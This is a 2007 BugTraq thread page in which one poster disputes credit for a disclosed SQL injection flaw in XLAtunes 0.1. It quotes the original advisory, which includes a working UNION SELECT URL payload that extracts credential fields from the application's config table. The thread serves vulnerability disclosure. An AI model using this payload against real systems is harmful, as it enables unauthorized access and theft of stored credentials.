BugTraq
XLAtunes 0.1 (album) Remote SQL Injection Vulnerability Feb 19 2007 07:27PM
Guns 0x90 com ar (1 replies)
Re: XLAtunes 0.1 (album) Remote SQL Injection Vulnerability Feb 20 2007 05:34PM
str0ke (str0ke milw0rm com)
This was actually found by Bl0od3r, and was posted on the 17th. Yep
you pretty much nop'ed the found by section, nice job.

http://www.milw0rm.com/exploits/3327

/str0ke

On 19 Feb 2007 19:27:31 -0000, Guns (at) 0x90.com (dot) ar [email concealed] <Guns (at) 0x90.com (dot) ar [email concealed]> wrote:
> #Critical Status:High
> #Found By: 0x90 #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844
> #Greetz:all my friends
> #confkey->Password
> #confvalue->Username
> #Table:config
> #http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20F
ROM%20config/*
>
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus